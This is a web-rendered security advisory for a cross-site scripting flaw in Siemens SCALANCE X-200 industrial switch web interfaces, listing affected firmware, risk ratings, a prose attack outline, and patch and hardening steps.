Siemens SCALANCE X-200 and X-200IRT Families (Update A)
Act Now9.6ICS-CERT ICSA-22-286-15Oct 11, 2022
Attack VectorNetwork
Auth RequiredNone
ComplexityLow
User InteractionRequired
Summary
Cross-site scripting (XSS) vulnerability in the web management interface of Siemens SCALANCE X-200 and X-200IRT switch families. An attacker can inject malicious JavaScript code to steal session cookies and hijack authenticated user sessions, potentially enabling unauthorized access to switch configuration and control. The vulnerability affects SCALANCE X200, X201, X202, X204, X206, X208, X212, X216, X224 models and XF-series variants across firmware versions prior to 5.2.5 (X204/X206/X208/X212/X216/X224) or 5.5.0 (X200/X201/X202/X204IRT/XF/SIPLUS NET models). Siemens has released firmware updates for all affected models.
What this means
What could happen
An attacker could inject malicious scripts into the web interface of affected SCALANCE switches to steal session cookies and hijack administrative sessions, allowing them to gain unauthorized access and control over network switching and IRT (Isochronous Real-Time) communication in the plant.
Who's at risk
Water utilities and electric utilities operating Siemens SCALANCE X-200, X-200IRT, X-204, X-206, X-208, X-212, X-216, X-224, XF-200, and XF-200 series managed switches used for industrial network connectivity and IRT synchronization. Particularly critical for facilities relying on these switches for SCADA network segmentation, PLC communication, and remote device connectivity.
How it could be exploited
An attacker crafts a malicious URL containing JavaScript code and tricks an operator or engineer into clicking it while logged into the switch's web interface. When the link is clicked, the script runs in the context of the user's browser session, capturing session cookies and sending them to the attacker. The attacker can then use the stolen cookie to impersonate the user and access the switch's management interface.
Prerequisites
- Network access to the SCALANCE switch web interface (typically port 80 or 443)
- A valid user must be logged into the web interface and click a malicious link
- The vulnerable switch must be running firmware version before 5.2.5 (X204/X206/X208/X212/X216/X224 families) or before 5.5.0 (X200/X201/X202/X204IRT/XF series)
Remotely exploitable via web interfaceUser interaction required (clicking malicious link)Session hijacking could lead to unauthorized device configuration changesAffects network infrastructure devices that bridge operational and management networksPatches are available but require maintenance windows
Exploitability
Low exploit probability (EPSS 0.7%)
Affected products (30)
30 with fix
ProductAffected VersionsFix Status
SCALANCE X200-4P IRT<V5.5.05.5.0
SCALANCE X201-3P IRT<V5.5.05.5.0
SCALANCE X201-3P IRT PRO<V5.5.05.5.0
SCALANCE X202-2IRT<V5.5.05.5.0
SCALANCE X202-2P IRT<V5.5.05.5.0
Remediation & Mitigation
0/4
Do now
0/2WORKAROUNDRestrict web interface access to the SCALANCE switches using network firewall rules—only permit management traffic from authorized engineering workstations and control center networks
WORKAROUNDDisable the web management interface on switches if not actively used for remote management; use serial console or local access only
Schedule — requires maintenance window
0/1Patching may require device reboot — plan for process interruption
HOTFIXUpdate all SCALANCE X-series and XF-series switches to firmware version 5.2.5 or later (X204/X206/X208/X212/X216/X224 families) or 5.5.0 or later (X200/X201/X202/X204IRT/XF201/XF202/XF204IRT and SIPLUS NET variants)
Long-term hardening
0/1HARDENINGSegment the management network from the plant floor operational network to isolate switch access from untrusted sources
CVEs (1)
↑↓ Navigate · Esc Close
API:
/api/v1/advisories/bdced2a3-b372-4681-b0eb-c24b62f2c316